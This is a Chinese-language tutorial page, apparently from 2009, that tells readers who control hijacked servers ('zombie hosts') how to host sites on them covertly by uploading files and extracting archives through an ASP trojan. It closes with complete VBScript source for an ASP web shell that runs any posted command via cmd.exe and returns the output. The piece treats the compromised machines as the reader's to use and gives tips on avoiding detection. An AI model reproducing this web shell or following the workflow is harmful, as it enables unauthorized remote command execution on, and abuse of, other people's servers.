当前位置: 首页 > 图文教程 > 网络编程 > ASP > 代码指导用ASP木马实现FTP和解压缩

ASP
生成像资源管理器一样的树形目录
将连接数据库的代码隐藏在DLL中
ASP中从数据库读取二进制文件数据代码
asp查询xml的代码,实现了无刷新、模糊查询功能
一个asp函数, 解决SQL Injection漏洞
在ASP中利用COM组件开发Web应用程序
关于如何利用COM+,来提高ASP执行权限的问题!
升级MD5.ASP,打造完全动态不重复的安全加密代码
ASP安全检测与过滤函数SafeCheck
在ASP中,用JScript脚本实现分页的另类办法
查看服务器Application/Session变量工具
自己写的一个简单ASP调用存储过程查询
ASP登陆验证页应做的安全问题
使用ASP与javascript配合实现多个复选框数据关联显示
Windows 2003下不注册组件用ASP发邮件
数据分页方法新思路,速度非常快!
ASP程序中同一个用户不允许同时登陆两次
分栏显示记录集的表格演示,并实现了分页
关于Adodb.Stream的写数据库数据到客户端文件的实践
将ASP的Debug变得简单的两个函数

代码指导用ASP木马实现FTP和解压缩


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-08-14   浏览: 186 ::
收藏到网摘: n/a

我想大家都有一些开了80端口的肉鸡吧,如果是国内的出于安全就不要往下看了,如果不不妨往下看一下,小弟献丑了,以求抛砖引玉。

在肉鸡上放网站最麻烦的可能就是更新和上传大量的文件了,终端服务大白天容易被发现,自己开个ftp又不放心.自己在网上转了一圈发现通过结合无组件上传和ASP木马可以轻松实现。

asp木马大家都很熟悉,无非就是一个cmd,有什么作用啊,你别急,听我慢慢说嘛.整体思路就是先通过ftp,139,或者winshell上传一个无组件asp程序。我选择了化境的Webedit(其实这个已经不是一个单纯的无组件上传的工具了,通过它还可以修改,删除文件/目录,可以用来更新页面喔,作起来广告了,我跟他没亲戚啊,闪过一个flying bottle..继续)和一个asp木马(如果,实在懒得找。最后带着源码,粘贴另存为asp文件即可),记住可都要在肉鸡的web目录喔.其实大多的问题webedit都可以解决,不过如果有很多文件一个一个上传可就麻烦了,怎么办?这下asp木马用上了。找一个rar.exe(所有装过了winrar的目录都有,说不定肉鸡上已经安好了,如果是别的命令行的解压缩工具也可以喔)把它拷到%SystemRoot%\system32\下。上传.zip或者.rar文件到该肉鸡的web目录。在浏览器地址栏里打开asp木马(暂时称之为trojan.asp),在text文本框里输入rar -x source.rar path解压缩成功,V,且慢如何得到web目录的绝对路径(path)呢?我用的是用土方法,修改trojan.asp加入一行转换虚拟目录成绝对路径并输出的语句<% =server.mappath(".") %>,"."可以随意改成任何的相对虚拟目录。

只是提供一个思路,如果哪个牛人可写一个asp的解压缩那更好喽,不过?谁会呢,我不会,你会吗?至于如何隐藏虚拟目录,支持简体中文显示等就不是该篇的讨论之列了,老话,安全第一,一般放个小的论坛或聊天室就可以了,如果真放个个人主页,还把自己的联系地址,电话号码也留给人家就不太好了.ps.junesun建议直接作成自解压,不知会不会弹出对话框。

以下为引用的内容:

<%@ Language=VBScript %>
<%
 Dim oScript
 Dim oScriptNet
 Dim oFileSys, oFile
 Dim szCMD, szTempFile
 On Error Resume Next
 <

  ' -- create the COM objects that we will be using -- '
  Set oScript = Server.createObject("WSCRIPT.SHELL")
  Set oScriptNet = Server.createObject("WSCRIPT.netWORK")
  Set oFileSys = Server.createObject("Scripting.FileSystemObject") <

  ' -- check for a command that we have posted -- '
  szCMD = Request.form(".CMD")
  If (szCMD <> "") Then <

   ' -- Use a poor man's pipe ... a temp file -- '
   szTempFile = "C:\" & oFileSys.GetTempName( )
   Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
   Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0) <

  End If <

%>
<HTML>
<BODY>
 <form action="<%= Request.ServerVariables("URL") %>" method="POST">
  <input type=text name=".CMD" size=45 value="<%= szCMD %>">
  <input type=submit value="Run">
 </form>
<PRE> <

 <%
  If (IsObject(oFile)) Then
   ' -- Read the output from our command and remove the temp file -- '
   On Error Resume Next
   Response.Write Server.HTMLEncode(oFile.ReadAll)
   oFile.Close
   Call oFileSys.deleteFile(szTempFile, True)
  End If
 %>
</BODY>
</HTML>